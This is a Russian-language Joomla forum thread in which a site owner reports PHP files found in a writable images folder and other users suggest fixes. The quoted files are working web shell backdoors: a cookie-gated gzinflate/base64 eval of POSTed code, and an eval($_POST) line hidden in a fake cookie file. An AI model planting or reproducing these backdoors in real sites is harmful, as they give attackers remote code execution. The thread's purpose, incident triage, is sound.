0 Пользователей и 1 Гость просматривают эту тему.
  • 5 Ответов
  • 3611 Просмотров
*

ilgizon87

  • Захожу иногда
  • 134
  • 11 / 0
Файлы.php в папке images
« : 03.05.2013, 14:14:21 »
Нашел в папке images (права 777) файлы вот стаким содержанием. Что делать в первую очередь?
Код
<?php if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit; ?>
Спойлер
[свернуть]
Код
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

125.253.118.88 FALSE /about/ FALSE 0 <?eval(stripslashes(array_pop($_POST)))?> 1
« Последнее редактирование: 04.05.2013, 21:50:31 от flyingspook »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Файлы.php в папке images
« Ответ #1 : 03.05.2013, 14:41:34 »
А зачем 777 на папку с картинками? Ставь 755
И посмотри еще файл .htaccess  в папках /images и
/images/stories
*

ilgizon87

  • Захожу иногда
  • 134
  • 11 / 0
Re: Файлы.php в папке images
« Ответ #2 : 03.05.2013, 14:53:59 »
к сожалению, права 777 нужны, стоит AdsManager и необходимо разрешать заливать изображения. заметил, что только в папках с 777 есть эти файлы
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Файлы.php в папке images
« Ответ #3 : 04.05.2013, 11:25:44 »
в папку images эти файлы попали скорей всего через расширение от nonumber 1.* линейка версий уязвима
*

ilgizon87

  • Захожу иногда
  • 134
  • 11 / 0
Re: Файлы.php в папке images
« Ответ #4 : 04.05.2013, 20:20:27 »
Вероятно, что все идет через от nonumber 1.*, посносил все к чертям...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Заражены файлы картинок движка Joomla 3

Автор krog

Ответов: 5
Просмотров: 1844
Последний ответ 16.04.2021, 08:16:45
от Taatshi
PHP в режиме FastCGI и права на файлы

Автор cntrl

Ответов: 12
Просмотров: 1746
Последний ответ 08.09.2020, 13:45:10
от Septdir
Хостинг оповестил что некоторые файлы вашего хостинга были изменены

Автор Элана

Ответов: 9
Просмотров: 1333
Последний ответ 15.01.2019, 18:54:28
от voland
Удалены файлы с сайта 1.error.php и 1.joomla_update.php

Автор Элана

Ответов: 18
Просмотров: 2827
Последний ответ 04.12.2018, 23:55:37
от winstrool
Можно ли защитить сайт от инъекций в файлы без обновления Joomla и расширений?

Автор borro

Ответов: 6
Просмотров: 2687
Последний ответ 09.11.2018, 18:36:44
от winstrool